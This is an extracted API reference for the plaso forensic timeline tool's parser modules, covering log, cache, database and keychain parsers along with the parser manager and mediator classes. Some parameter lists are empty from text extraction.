YYYY-MM-DD HH:MM:SS action pkg installed-version available-version Where action is:

install, upgrade, configure, trigproc, disappear, remove or purge.

YYYY-MM-DD HH:MM:SS conffile filename decision Where decision is install or keep.

class plaso.parsers.dpkg.DpkgEventDataBases: plaso.containers.events.EventData

Dpkg event data.

bodybody of the log line.

Type str

DATA_TYPE = 'dpkg:line'

class plaso.parsers.dpkg.DpkgParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parser for Debian package manager log (dpkg.log) files.

DATA_FORMAT = 'Debian package manager log (dpkg.log) file'

LINE_STRUCTURES = [('line', {Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {Combine:({{"startup" archives | packages} unpack | install | configure | triggers-only | remove | purge}) | Combine:({{{"status" W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{{install | upgrade | configure | trigproc | disappear | remove | purge W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{"conffile" W:(0123...)} install | keep})}})]

NAME = 'dpkg'

ParseRecord(parser_mediator, key, structure)Parses a structure of tokens derived from a line of a text file.

Parameters





• structure (pyparsing.ParseResults) – structure of tokens derived from a lineof a text file.


VerifyStructure(parser_mediator, line)Verifies if a line from a text file is in the expected format.

Parameters


• line (str) – line from a text file.

Returns True if the line is in the expected format, False if not.

Return type bool

plaso.parsers.dsv_parser module

Delimiter separated values (DSV) parser interface.

class plaso.parsers.dsv_parser.DSVParser(encoding=None)Bases: plaso.parsers.interface.FileObjectParser

Delimiter separated values (DSV) parser interface.

COLUMNS = []

DELIMITER = ','

ESCAPE_CHARACTER = ''

FIELD_SIZE_LIMIT = 131072




NUMBER_OF_HEADER_LINES = 0

ParseFileObject(parser_mediator, file_object)Parses a DSV text file-like object.

Parameters




abstract ParseRow(parser_mediator, row_offset, row)Parses a line of the log file and produces events.

Parameters


• row_offset (int) – offset of the row.

• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.



QUOTE_CHAR = '"'

abstract VerifyRow(parser_mediator, row)Verifies if a line of the file is in the expected format.

Parameters




Return type bool

plaso.parsers.dtfabric_parser module

Shared functionality for dtFabric-based data format parsers.

class plaso.parsers.dtfabric_parser.DtFabricBaseParserBases: plaso.parsers.interface.FileObjectParser

Shared functionality for dtFabric-based data format parsers.

A dtFabric-based data format parser defines its data format structures in dtFabric definition file, for example“dtfabric.yaml”:


signed

size4

unitsbytes


little-endian

members: - name: x













abstract ParseFileObject(parser_mediator, file_object)Parses a file-like object.

Parameters




plaso.parsers.esedb module

Parser for Extensible Storage Engine (ESE) database files (EDB).

class plaso.parsers.esedb.ESEDBCacheBases: plaso.parsers.plugins.BasePluginCache

A cache storing query results for ESEDB plugins.

StoreDictInCache(attribute_name, dict_object)Store a dict object in cache.

Parameters

• attribute_name (str) – name of the attribute.

• dict_object (dict) – dictionary.

class plaso.parsers.esedb.ESEDBParserBases: plaso.parsers.interface.FileObjectParser

Parses Extensible Storage Engine (ESE) database files (EDB).

DATA_FORMAT = 'Extensible Storage Engine (ESE) Database File (EDB) format'




NAME = 'esedb'

ParseFileObject(parser_mediator, file_object)Parses an ESE database file-like object.

Parameters





plaso.parsers.filestat module

File system stat object parser.

class plaso.parsers.filestat.FileStatEventDataBases: plaso.containers.events.EventData

File system stat event data.

display_namedisplay name.

Type str

file_entry_typedfVFS file entry type.

Type int

file_sizefile size in bytes.

Type int

file_system_typefile system type.

Type str

filenamename of the file.

Type str

inodeinode of the file.

Type int

is_allocatedTrue if the file is allocated.

Type bool

DATA_TYPE = 'fs:stat'

class plaso.parsers.filestat.FileStatParserBases: plaso.parsers.interface.FileEntryParser

Parses file system stat object.

DATA_FORMAT = 'file system stat information'

NAME = 'filestat'

ParseFileEntry(parser_mediator, file_entry)Parses a file entry.

Parameters


• file_entry (dfvfs.FileEntry) – a file entry.



plaso.parsers.firefox_cache module

Implements a parser for Firefox cache 1 and 2 files.

class plaso.parsers.firefox_cache.BaseFirefoxCacheParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parses Firefox cache files.

class plaso.parsers.firefox_cache.FirefoxCache2ParserBases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser

Parses Firefox cache version 2 files (Firefox 32 or later).

DATA_FORMAT = 'Mozilla Firefox Cache version 2 file (version 32 or later)'

NAME = 'firefox_cache2'

ParseFileObject(parser_mediator, file_object)Parses a Firefox cache file-like object.

Parameters




class plaso.parsers.firefox_cache.FirefoxCacheEventDataBases: plaso.containers.events.EventData

Firefox cache event data.

data_sizesize of the cached data.

Type int

fetch_countnumber of times the cache entry was fetched.

Type int

frequency???

Type int

info_sizesize of the metadata.

Type int

location???

Type str

request_methodHTTP request method.

Type str

request_sizeHTTP request byte size.



Type int

response_codeHTTP response code.

Type int

urlURL of original content.

Type str

versioncache format version.

Type int

DATA_TYPE = 'firefox:cache:record'

class plaso.parsers.firefox_cache.FirefoxCacheParserBases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser

Parses Firefox cache version 1 files (Firefox 31 or earlier).

DATA_FORMAT = 'Mozilla Firefox Cache version 1 file (version 31 or earlier)'

FIREFOX_CACHE_CONFIGalias of firefox_cache_config

NAME = 'firefox_cache'

ParseFileObject(parser_mediator, file_object)Parses a Firefox cache file-like object.

Parameters




plaso.parsers.fseventsd module

Parsers for MacOS fseventsd files.

class plaso.parsers.fseventsd.FseventsdEventDataBases: plaso.containers.events.EventData

MacOS file system event (fseventsd) event data

event_identifierthe record event identifier.

Type int

flagsflags stored in the record.

Type int

node_identifierfile system node identifier related to the file system event.

Type int



pathpath recorded in the fseventsd record.

Type str

DATA_TYPE = 'macos:fseventsd:record'

class plaso.parsers.fseventsd.FseventsdParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for fseventsd files.

This parser supports both version 1 and version 2 fseventsd files. Refer to http://nicoleibrahim.com/apple-fsevents-forensics/ for details.

DATA_FORMAT = 'MacOS File System Events Disk Log Stream (fseventsd) file'




NAME = 'fseventsd'

ParseFileObject(parser_mediator, file_object)Parses an fseventsd file.

Parameters



Raises UnableToParseFile – when the header cannot be parsed.

plaso.parsers.gdrive_synclog module

Parser for Google Drive Sync log files.

class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventDataBases: plaso.containers.events.EventData

Google Drive Sync log event data.

log_levellogging level of event such as “DEBUG”, “WARN”, “INFO”, “ERROR”.

Type str

messagelog message.

Type str

pidprocess identifier of process which logged event.

Type int

source_codefilename:line_number of source file which logged event.

Type str


http://nicoleibrahim.com/apple-fsevents-forensics/

http://nicoleibrahim.com/apple-fsevents-forensics/


threadcolon-separated thread identifier in the form “ID:name” which logged event.

Type str

DATA_TYPE = 'gdrive_sync:log:line'

class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parses events from Google Drive Sync log files.

BUFFER_SIZE = 16384

DATA_FORMAT = 'Google Drive Sync log file'

LINE_STRUCTURES = [('logline', {{{{{{Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)}) W:(ABCD...)} W:(0123...)} W:(0123...)} W:(0123...)} SkipTo:({StringEnd | Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)})})} [lineEnd]...})]

NAME = 'gdrive_synclog'


Parameters





VerifyStructure(parser_mediator, lines)Verify that this file is a Google Drive Sync log file.

Parameters




Return type bool

plaso.parsers.google_logging module

Parser for Google-formatted log files.

class plaso.parsers.google_logging.GoogleLogEventData(data_type='googlelog:log')Bases: plaso.containers.events.EventData

Google-formatted log file event data.

See: https://github.com/google/glog. This format is also used by Kubernetes, see https://github.com/kubernetes/klog

file_namethe name of the source file that logged the message.

Type str


https://github.com/google/glog

https://github.com/kubernetes/klog

https://github.com/kubernetes/klog


line_numberthe line number in the source file where the logging statement is.

Type int

messagethe log message.

Type str

prioritythe priority of the message - I, W, E or F. These values represent messages logged at INFO, WARNING,ERROR or FATAL severities, respectively.

Type str

thread_identifierthe identifier of the thread that recorded the message.

Type int

DATA_TYPE = 'googlelog:log'

class plaso.parsers.google_logging.GoogleLogParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parser for Google-formatted log files.

DATA_FORMAT = 'Google-formatted log file'

LINE_STRUCTURES = [('log_entry', {{{{{{{{I | W | E | F {{{{{{{W:(0123...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]}} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("] ")} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd}), ('greeting_start', "Log file created at: "), ('greeting', {{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd})]

NAME = 'googlelog'


Parameters





VerifyStructure(parser_mediator, lines)Verifies that this is a google log-formatted file.

Parameters




Return type bool



plaso.parsers.iis module

Parser for Windows IIS Log file.

More documentation on fields can be found here: https://msdn.microsoft.com/en-us/library/ms525807(v=vs.90).aspx

class plaso.parsers.iis.IISEventDataBases: plaso.containers.events.EventData

IIS log event data.

Attributes:

DATA_TYPE = 'iis:log:line'

class plaso.parsers.iis.WinIISParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses a Microsoft IIS log file.

BLANK = "-"

COMMENT = {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}

DATA_FORMAT = 'Microsoft IIS log file'

DATE_METADATA = {"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}}

DATE_TIME = {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}

FIELDS_METADATA = {"Fields:" SkipTo:(LineEnd)}

INTEGER = {W:(0123...) | "-"}

IP_ADDRESS = {{IPv4 address | IPv6 address} | "-"}

LINE_STRUCTURES = [('comment', {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}), ('logline', {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}})]

LOG_LINE_6_0 = {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}}

NAME = 'winiis'

PORT = {W:(0123...) | "-"}


Parameters



• structure (pyparsing.ParseResults) – structure parsed from the log file.


QUERY = {W:(ABCD...) | "-"}

URI = {W:(ABCD...) | "-"}

VerifyStructure(parser_mediator, line)Verify that this file is an IIS log file.

Parameters



https://msdn.microsoft.com/en-us/library/ms525807(v=vs.90).aspx



Returns True if the line was successfully parsed.

Return type bool

WORD = {W:(ABCD...) | "-"}

plaso.parsers.interface module

The parsers and plugins interface classes.

class plaso.parsers.interface.BaseFileEntryFilterBases: object

File entry filter interface.

abstract Match(file_entry)Determines if a file entry matches the filter.

Parameters file_entry (dfvfs.FileEntry) – a file entry.


Return type bool

class plaso.parsers.interface.BaseParserBases: object

The parser interface.

DATA_FORMAT = ''

classmethod DeregisterPlugin(plugin_class)Deregisters a plugin class.


Parameters plugin_class (type) – class of the plugin.

Raises KeyError – if plugin class is not set for the corresponding name.

EnablePlugins(plugin_includes)Enables parser plugins.

Parameters plugin_includes (list[str]) – names of the plugins to enable, whereNone or an empty list represents all plugins. Note the default plugin, if it exists, is alwaysenabled and cannot be disabled.

FILTERS = frozenset({})


Returns a format specification or None if not available.


classmethod GetPluginObjectByName(plugin_name)Retrieves a specific plugin object by its name.

Parameters plugin_name (str) – name of the plugin.

Returns a plugin object or None if not available.

Return type BasePlugin



classmethod GetPlugins()Retrieves the registered plugins.

Yields tuple[str, type] – name and class of the plugin.

NAME = 'base_parser'

classmethod RegisterPlugin(plugin_class)Registers a plugin class.


Parameters plugin_class (type) – class of the plugin.


classmethod RegisterPlugins(plugin_classes)Registers plugin classes.

Parameters plugin_classes (list[type]) – classes of plugins.


classmethod SupportsPlugins()Determines if a parser supports plugins.

Returns True if the parser supports plugins.

Return type bool

class plaso.parsers.interface.FileEntryParserBases: plaso.parsers.interface.BaseParser

The file entry parser interface.

Parse(parser_mediator)Parsers the file entry and extracts event objects.

Parameters parser_mediator (ParserMediator) – a parser mediator.


abstract ParseFileEntry(parser_mediator, file_entry)Parses a file entry.

Parameters


• file_entry (dfvfs.FileEntry) – a file entry to parse.


class plaso.parsers.interface.FileNameFileEntryFilter(filename)Bases: plaso.parsers.interface.BaseFileEntryFilter

File name file entry filter.

Match(file_entry)Determines if a file entry matches the filter.

Parameters file_entry (dfvfs.FileEntry) – a file entry.


Return type bool



class plaso.parsers.interface.FileObjectParserBases: plaso.parsers.interface.BaseParser

The file-like object parser interface.

Parse(parser_mediator, file_object)Parses a single file-like object.

Parameters


• file_object (dvfvs.FileIO) – a file-like object to parse.


abstract ParseFileObject(parser_mediator, file_object)Parses a file-like object.

Parameters




plaso.parsers.java_idx module

Parser for Java Cache IDX files.

class plaso.parsers.java_idx.JavaIDXEventDataBases: plaso.containers.events.EventData

Java IDX cache file event data.

idx_versionformat version of IDX file.

Type str

ip_addressIP address of the host in the URL.

Type str

urlURL of the downloaded file.

Type str

DATA_TYPE = 'java:download:idx'

class plaso.parsers.java_idx.JavaIDXParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Java WebStart Cache IDX files.

There are five structures defined. 6.02 files had one generic section that retained all data. From 6.03, the filewent to a multi-section format where later sections were optional and had variable-lengths. 6.03, 6.04, and 6.05files all have their main data section (#2) begin at offset 128. The short structure is because 6.05 files deviateafter the 8th byte. So, grab the first 8 bytes to ensure it’s valid, get the file version, then continue on with thecorrect structures.

DATA_FORMAT = 'Java WebStart Cache IDX file'



NAME = 'java_idx'

ParseFileObject(parser_mediator, file_object)Parses a Java WebStart Cache IDX file-like object.

Parameters




plaso.parsers.logger module

The parsers sub module logger.

plaso.parsers.mac_appfirewall module

Parser for MacOS Application firewall log (appfirewall.log) files.

class plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataBases: plaso.containers.events.EventData

MacOS Application firewall log (appfirewall.log) file event data.

actionaction.

Type str

agentagent that save the log.

Type str

computer_namename of the computer.

Type str

process_namename of the entity that tried do the action.

Type str

statussaved status action.

Type str

DATA_TYPE = 'mac:appfirewall:line'

class plaso.parsers.mac_appfirewall.MacAppFirewallParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parser for MacOS Application firewall log (appfirewall.log) files.

DATA_FORMAT = 'MacOS Application firewall log (appfirewall.log) file'

DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})

FIREWALL_LINE = {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}



LINE_STRUCTURES = [('logline', {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")})]

NAME = 'mac_appfirewall_log'


Parameters





REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")}

VerifyStructure(parser_mediator, line)Verify that this file is a Mac AppFirewall log file.

Parameters




Return type bool

plaso.parsers.mac_keychain module

Parser for MacOS keychain database files.

class plaso.parsers.mac_keychain.KeychainApplicationRecordEventDataBases: plaso.containers.events.EventData

MacOS keychain application password record event data.

account_namename of the account.

Type str

commentscomments added by the user.

Type str

entry_namename of the entry.

Type str

ssgp_hashpassword/certificate hash formatted as an hexadecimal string.

Type str

text_descriptiondescription.



Type str

DATA_TYPE = 'mac:keychain:application'

class plaso.parsers.mac_keychain.KeychainDatabaseColumnBases: object

MacOS keychain database column.

attribute_data_typeattribute (data) type.

Type int

attribute_identifierattribute identifier.

Type int

attribute_nameattribute name.

Type str

class plaso.parsers.mac_keychain.KeychainDatabaseTableBases: object

MacOS keychain database table.

columnscolumns.

Type list[KeychainDatabaseColumn]

recordsrecords.

Type list[dict[str, str]]

relation_identifierrelation identifier.

Type int

relation_namerelation name.

Type str

class plaso.parsers.mac_keychain.KeychainInternetRecordEventDataBases: plaso.containers.events.EventData

MacOS keychain internet record event data.

account_namename of the account.

Type str

commentscomments added by the user.

Type str

entry_namename of the entry.



Type str

protocolinternet protocol used, for example “https”.

Type str

ssgp_hashpassword/certificate hash formatted as an hexadecimal string.

Type str

text_descriptiondescription.

Type str

type_protocolsub-protocol used, for example “form”.

Type str

wheredomain name or IP where the password is used.

Type str

DATA_TYPE = 'mac:keychain:internet'

class plaso.parsers.mac_keychain.KeychainParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for MacOS keychain database files.

DATA_FORMAT = 'MacOS keychain database file'




NAME = 'mac_keychain'

ParseFileObject(parser_mediator, file_object)Parses a MacOS keychain file-like object.

Parameters






plaso.parsers.mac_securityd module

Parses MacOS security daemon (securityd) log files.

Also see: http://opensource.apple.com/source/Security/Security-55471/sec/securityd/

class plaso.parsers.mac_securityd.MacOSSecuritydLogEventDataBases: plaso.containers.events.EventData

MacOS securityd log event data.

callercaller, consists of two hex numbers.

Type str

facilityfacility.

Type str

levelpriority level.

Type str

messagemessage.

Type str

security_apiname of securityd function.

Type str

sender_pidprocess identifier of the sender.

Type int

sendername of the sender.

Type str

DATA_TYPE = 'mac:securityd:line'

class plaso.parsers.mac_securityd.MacOSSecuritydLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses MacOS security daemon (securityd) log files.

DATA_FORMAT = 'MacOS security daemon (securityd) log file'

DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})

LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")})]

NAME = 'mac_securityd'


Parameters


http://opensource.apple.com/source/Security/Security-55471/sec/securityd/






REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")}

SECURITYD_LINE = {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}

VerifyStructure(parser_mediator, line)Verify that this file is a securityd log file.

Parameters




Return type bool

plaso.parsers.mac_wifi module

Parses for MacOS Wifi log (wifi.log) files.

class plaso.parsers.mac_wifi.MacWifiLogEventDataBases: plaso.containers.events.EventData

Mac Wifi log event data.

actionknown WiFI action, for example connected to an AP, configured, etc. If the action is not known, the valueis the message of the log (text variable).

Type str

agentname and identifier of process that generated the log message.

Type str

functionname of function that generated the log message.

Type str

textlog message

Type str

DATA_TYPE = 'mac:wifilog:line'

class plaso.parsers.mac_wifi.MacWifiLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses MacOS Wifi log (wifi.log) files.

DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'



LINE_STRUCTURES = [('header', {Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) "***Starting Up***"}), ('turned_over_header', {Group:({{W:(ABCD..., abcd...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Combine:({{{W:(0123...) W:(0123...)} "logfile turned over"} LineEnd})}), ('known_function_logline', {{{{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) {{"<" Combine:({"airportd" !W:(>)})} ">"}} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"} SkipTo:(lineEnd)}), ('logline', {{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) ~{{{{{"<" Combine:({"airportd" !W:(>)})} ">"} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"}}} SkipTo:(lineEnd)})]

NAME = 'macwifi'


Parameters





THREE_DIGITS = W:(0123...)

THREE_LETTERS = W:(ABCD...)

VerifyStructure(parser_mediator, line)Verify that this file is a Mac Wifi log file.

Parameters




Return type bool

plaso.parsers.mactime module

Parser for the Sleuthkit (TSK) bodyfile or mactime format.

The format specifications can be read here: http://wiki.sleuthkit.org/index.php?title=Body_file

class plaso.parsers.mactime.MactimeEventDataBases: plaso.containers.events.EventData

Mactime event data.


Type str

inode“inode” of the file. Note that inode is an overloaded term in the context of mactime and used for MFTentry index values as well.

Type int

md5MD5 hash of the file content, formatted as a hexadecimal string.

Type str

mode_as_stringprotection mode.


http://wiki.sleuthkit.org/index.php?title=Body_file


Type str

offsetnumber of the corresponding line.

Type int

sizesize of the file content.

Type int

user_giduser group identifier (GID).

Type int

user_siduser security identifier (SID).

Type str

DATA_TYPE = 'fs:mactime:line'

class plaso.parsers.mactime.MactimeParser(encoding=None)Bases: plaso.parsers.dsv_parser.DSVParser

SleuthKit bodyfile parser.

COLUMNS = ['md5', 'name', 'inode', 'mode_as_string', 'uid', 'gid', 'size', 'atime', 'mtime', 'ctime', 'btime']

DATA_FORMAT = 'SleuthKit version 3 bodyfile'

DELIMITER = '|'

ESCAPE_CHARACTER = '\\'

NAME = 'mactime'

ParseRow(parser_mediator, row_offset, row)Parses a line of the log file and produces events.

Parameters


• row_offset (int) – number of the corresponding line.


VerifyRow(parser_mediator, row)Verifies if a line of the file is in the expected format.

Parameters




Return type bool



plaso.parsers.manager module

The parsers and plugins manager.

class plaso.parsers.manager.ParsersManagerBases: object

The parsers and plugins manager.

classmethod CheckFilterExpression(parser_filter_expression)Checks parser and plugin names in a parser filter expression.

Parameters parser_filter_expression (str) – parser filter expression, where Nonerepresents all parsers and plugins.

A parser filter expression is a comma separated value string that denotes which parsers andplugins should be used. See filters/parser_filter.py for details of the expression syntax.

This function does not support presets, and requires a parser filter expression where presetshave been expanded.

Returns

containing:

• set(str): parser filter expression elements that contain known parser and/or pluginnames.

• set(str): parser filter expression elements that contain unknown parser and/orplugin names.

Return type tuple

classmethod CreateSignatureScanner(specification_store)Creates a signature scanner for format specifications with signatures.

Parameters specification_store (FormatSpecificationStore) – format speci-fications with signatures.

Returns signature scanner.

Return type pysigscan.scanner

classmethod DeregisterParser(parser_class)Deregisters a parser class.

The parser classes are identified based on their lower case name.

Parameters parser_class (type) – parser class (subclass of BaseParser).

Raises KeyError – if parser class is not set for the corresponding name.

classmethod GetFormatsWithSignatures(parser_filter_expression=None)Retrieves the format specifications that have signatures.

This method will create a specification store for parsers that define a format specification with signaturesand a list of parser names for those that do not.

Parameters parser_filter_expression (Optional[str]) – parser filter expres-sion, where None represents all parsers and plugins.





Returns

containing:

• FormatSpecificationStore: format specifications with signatures.

• list[str]: names of parsers that do not have format specifications with signatures, orhave signatures but also need to be applied ‘brute force’.

Return type tuple

classmethod GetNamesOfParsersWithPlugins()Retrieves the names of all parsers with plugins.

Returns names of all parsers with plugins.


classmethod GetParserAndPluginNames(parser_filter_expression=None)Retrieves the parser and parser plugin names.




Returns parser and parser plugin names.


classmethod GetParserObjectByName(parser_name)Retrieves a specific parser object by its name.

Parameters parser_name (str) – name of the parser.

Returns parser object or None.

Return type BaseParser

classmethod GetParserObjects(parser_filter_expression=None)Retrieves the parser objects.




Returns parsers per name.

Return type dict[str, BaseParser]

classmethod GetParserPluginsInformation(parser_filter_expression=None)Retrieves the parser plugins information.






Returns pairs of parser plugin names and descriptions.

Return type list[tuple[str, str]]

classmethod GetParsersInformation()Retrieves the parsers information.

Returns parser names and descriptions.

Return type list[tuple[str, str]]

classmethod RegisterParser(parser_class)Registers a parser class.


Parameters parser_class (type) – parser class (subclass of BaseParser).

Raises KeyError – if parser class is already set for the corresponding name.

classmethod RegisterParsers(parser_classes)Registers parser classes.


Parameters parser_classes (list[type]) – parsers classes (subclasses of BaseParser).

Raises KeyError – if parser class is already set for the corresponding name.

plaso.parsers.mcafeeav module

Parser for McAfee Anti-Virus Logs.

McAfee AV uses 4 logs to track when scans were run, when virus databases were updated, and when files match thevirus database.

class plaso.parsers.mcafeeav.McafeeAVEventDataBases: plaso.containers.events.EventData

McAfee AV Log event data.

actionaction.

Type str

filenamefilename.

Type str

rulerule.

Type str

statusstatus.

Type str

trigger_locationtrigger location.



Type str

usernameusername.

Type str

DATA_TYPE = 'av:mcafee:accessprotectionlog'

class plaso.parsers.mcafeeav.McafeeAccessProtectionParser(encoding=None)Bases: plaso.parsers.dsv_parser.DSVParser

Parses the McAfee AV Access Protection Log.

COLUMNS = ['date', 'time', 'status', 'username', 'filename', 'trigger_location', 'rule', 'action']

DATA_FORMAT = 'McAfee Anti-Virus access protection log file'

DELIMITER = '\t'

NAME = 'mcafee_protection'


Parameters


• row_offset (int) – line number of the row.



Parameters




Return type bool

plaso.parsers.mediator module

The parser mediator.

class plaso.parsers.mediator.ParserMediator(storage_writer, knowledge_base, col-lection_filters_helper=None, pre-ferred_year=None, resolver_context=None,temporary_directory=None)

Bases: object

Parser mediator.

collection_filters_helpercollection filters helper.

Type CollectionFiltersHelper



last_activity_timestamptimestamp received that indicates the last time activity was observed. The last activity timestamp is updatedwhen the mediator produces an attribute container, such as an event source. This timestamp is used bythe multi processing worker process to indicate the last time the worker was known to be active. Thisinformation is then used by the foreman to detect workers that are not responding (stalled).

Type int

AddEventAttribute(attribute_name, attribute_value)Adds an attribute that will be set on all events produced.

Setting attributes using this method will cause events produced via this mediator to have an attribute withthe provided name set with the provided value.

Parameters

• attribute_name (str) – name of the attribute to add.

• attribute_value (str) – value of the attribute to add.

Raises KeyError – if the event attribute is already set.

AppendToParserChain(plugin_or_parser)Adds a parser or parser plugin to the parser chain.

